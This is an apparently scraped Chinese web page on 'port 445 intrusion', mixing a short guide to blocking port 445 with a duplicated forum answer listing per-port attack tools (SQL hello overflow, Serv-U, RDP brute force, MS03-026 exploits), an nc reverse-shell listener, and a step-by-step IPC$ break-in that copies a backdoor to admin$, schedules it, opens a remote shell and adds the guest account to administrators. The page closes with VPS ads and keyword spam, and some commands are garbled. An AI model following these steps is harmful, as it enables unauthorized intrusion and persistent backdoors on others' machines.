445端口入侵开放53 445端口后怎么利用dns溢出漏洞入侵

445端口入侵  时间:2021-06-12  阅读:()

如何防止445端口入侵

端口排除法   这种方法利用了Windows 2000系统的端口排除功能将来自于445端口的所有信息包全部禁止掉,让“大恶人”们无法接近你的主机,下面是这种方法的具体实现步骤: [445]   打开Windows 2000系统的开始菜单,选中“设置”项下面的“网络和拨号连接”图标,并用鼠标右键单击之,从其后的快捷菜单中,单击“浏览”命令;   在接着出现的窗口中,右击“连接”图标,选中“属性”选项,弹出连接属性窗口;打开“常规”标签页面,将其中的 “协议(TCP/IP)”项选中,然后再单击一下“属性”按钮,打开协议(TCP/IP)属性设置页面;   继续单击该页面中的“高级”按钮,打开高级TCP/IP设置窗口,选中其中的“选项”标签,并在该标签页面的“可选的设置”项中,将“TCP/IP筛选”选中,再单击一下对应的“属性”按钮,打开如图1所示的设置窗口;   由于445端口属于一种TCP端口,你可以在对应“TCP端口”的设置项处,将“只允许”项选中,激活下面的“添加”按钮,单击该按钮,在其后打开的 “添加筛选器”窗口中,将必须用到的几个服务端口号码,都添加进来,而将用不到的445端口号码排除在外,设置完毕后,单击“确定”按钮,就可以让设置生效了。

各端口入侵详解

展开全部 各种端口入侵<系统>1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 ============================= 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。

(tscrack.exe)4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。

(小榕的注入软件)。

5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。

(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。

(servlocal.exe) ====================================== 对serv-u的MD5加密密码,可以用字典暴破。

(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。

如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口 用real554.exe入侵。

7. 6129端口 用DameWare6129.exe入侵。

8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。

9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。

(可用mydoomscan.exe查)。

10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵 1. C:& use \127.0.0.1IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:>copy srv.exe \127.0.0.1admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:winntsystem32,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:& time \127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:>at \127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!) 5. C:& time \127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:> 127.0.0.1 99 这里会用到命令吧,注意端口是99。

默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个服务!这就要用到ntlm了 7.C:>copy ntlm.exe \127.0.0.1admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:WINNTsystem32>ntlm 输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。

当出现"DONE"的时候,就说明已经启动正常。

然后使用& start "来开启服务! 9. 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组 10. C:& user guest /active:yes 将对方的Guest用户激活11. C:& user guest 1234 将Guest的密码改为1234,或者你要设定的密码12. C:& localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) 正常入侵1433 135 139 4489 3389 80 联系QQ16722500 提供工具YEHOHO

知道端口怎么入侵???详细方法~~

计算机"端口"是英文port的义译,可以认为是计算机与外界通讯交流的出口。

其中硬件领域的端口又称接口,如:USB端口、串行端口等。

软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入输出)缓冲区。

  按端口号可分为3大类:

  (1)公认端口(WellKnownPorts):从0到1023,它们紧密绑定(binding)于一些服务。

通常这些端口的通讯明确表明了某种服务的协议。

例如:80端口实际上总是HTTP通讯。

  (2)注册端口(RegisteredPorts):从1024到49151。

它们松散地绑定于一些服务。

也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。

例如:许多系统处理动态端口从1024左右开始。

  (3)动态和/或私有端口(Dynamicand/orPrivatePorts):从49152到65535。

理论上,不应为服务分配这些端口。

实际上,机器通常从1024起分配动态端口。

但也有例外:SUN的RPC端口从32768开始。

  1. 1433端口入侵

  scanport.exe 查有1433的机器

  SQLScanPass.exe 进行字典暴破(字典是关键)

  最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

  (以上反向的,测试成功)

  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

  2. 4899端口入侵

  用4899过滤器.exe,扫描空口令的机器

  3. 3899的入侵

  对很早的机器,可以试试3389的溢出(win3389ex.exe)

  对2000的机器,可以试试字典暴破。

(tscrack.exe)

  4. 80入侵

  对sp3以前的机器,可以用webdav入侵;

  对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

  可以利用SQL进行注入。

(啊D的注入软件)。

  5. serv-u入侵(21端口)

  对5. 004及以下系统,可用溢出入侵。

(serv5004.exe)

  对5.1.0.0及以下系统,可用本地提升权限。

(servlocal.exe)

  对serv-u的MD5加密密码,可以用字典暴破。

(crack.vbs)

  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

  6. 554端口

  用real554.exe入侵。

7. 6129端口

  用DameWare6129.exe入侵。

  8. 系统漏洞

  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。

9. 3127等端口

  可以利用doom病毒开的端口,用nodoom.exe入侵。

(可用mydoomscan.exe查)。

  10. 其他入侵

  利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

  经典IPC$入侵

  1. C:& use $">\127.0.0.1IPC$ "" /user:"admintitrators"

  这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

  2. C:>copy srv.exe $">\127.0.0.1admin$

  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:winntsystem32,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

  3. C:& time file://127.0.0.1/

  查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

  4. C:>at file://127.0.0.1/ 11:05 srv.exe

  用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.

  5. C:& time file://127.0.0.1/

  再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

  6. C:> 127.0.0.1 99

  这里会用到命令吧,注意端口是99。

默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

  虽然我们可以上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个服务!这就要用到ntlm了

  7.C:>copy ntlm.exe $">\127.0.0.1admin$

  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

  8. C:WINNTsystem32>ntlm

  输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。

当出现"DONE"的时候,就说明已经启动正常。

然后使用 start "来开启服务!

  9. 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在Dos上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组

  10. C:& user guest /active:yes

  将对方的Guest用户激活

  11. C:& user guest 1234

  将Guest的密码改为1234,或者你要设定的密码

  12. C:& localgroup administrators guest /add

  将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

望采纳!

开放53 445端口后怎么利用dns溢出漏洞入侵

系统漏洞会影响到的范围很大,包括系统本身及其支撑软件,网络客户和服务器软件,网络路由器和安全防火墙等。

腾讯电脑管家可以修复Windows操作系统漏洞,还可以智能筛选区分出高危漏洞补丁及功能性补丁,操作方法:腾讯电脑管家-工具箱-选择"修复漏洞"。

Hostodo(年付12美元)斯波坎VPS六六折,美国西海岸机房

Hostodo是一家成立于2014年的国外VPS主机商,现在主要提供基于KVM架构的VPS主机,美国三个地区机房:拉斯维加斯、迈阿密和斯波坎,采用NVMe或者SSD磁盘,支持支付宝、PayPal、加密货币等付款方式。商家最近对于上架不久的斯波坎机房SSD硬盘VPS主机提供66折优惠码,适用于1GB或者以上内存套餐年付,最低每年12美元起。下面列出几款套餐配置信息。CPU:1core内存:256MB...

totyun:香港cn2 vps,5折优惠,$6/月,10Mbps带宽,不限流量,2G内存/2核/20g+50g

totyun,新公司,主要运作香港vps、日本vps业务,接入cn2网络,不限制流量!VPS基于KVM虚拟,采用系统盘和数据盘分离,从4G内存开始支持Windows系统...大家注意下,网络分“Premium China”、“Global”,由于站长尚未测试,所以也还不清楚情况,有喜欢吃螃蟹的尝试过不妨告诉下站长。官方网站:https://totyun.com一次性5折优惠码:X4QTYVNB3P...

两款半月湾 HMBcloud 春节88折日本和美国CN2 VPS主机套餐

春节期间我们很多朋友都在忙着吃好喝好,当然有时候也会偶然的上网看看。对于我们站长用户来说,基本上需要等到初八之后才会开工,现在有空就看看是否有商家的促销。这里看到来自HMBcloud半月湾服务商有提供两款春节机房方案的VPS主机88折促销活动,分别是来自洛杉矶CN2 GIA和日本CN2的方案。八八折优惠码:CNY-GIA第一、洛杉矶CN2 GIA美国原生IP地址、72小时退款保障、三网回程CN2 ...

445端口入侵为你推荐
mac地址克隆路由器的Mac地址克隆有什么作用?应用雷达雷达是什么东西防火墙排名什么防火墙最好assemblyinfo求教如何修改AssemblyInfo.cs的版本号遗传算法实例如何用C语言实现遗传算法的实际应用?labelforhtml标签中lable的for属性有什么作用?单元测试规范如何写线程池的单元测试kjavaKJAVA业务信息费是什么东西啊,我怎么会被莫莫名其妙的扣掉11元啊免费下载空间要下载免费空间播放器怎么弄鸿道集团王老吉、鸿道集团、加多宝集团、广药公司是怎么回事?
php主机空间 域名交易网 ipage 132邮箱 l5520 外国域名 监控宝 php免费空间 空间服务商 主机合租 长沙服务器 国内php空间 网通代理服务器 个人免费空间 cdn加速原理 域名和空间 qq云端 cdn加速是什么 电信虚拟主机 1美金 更多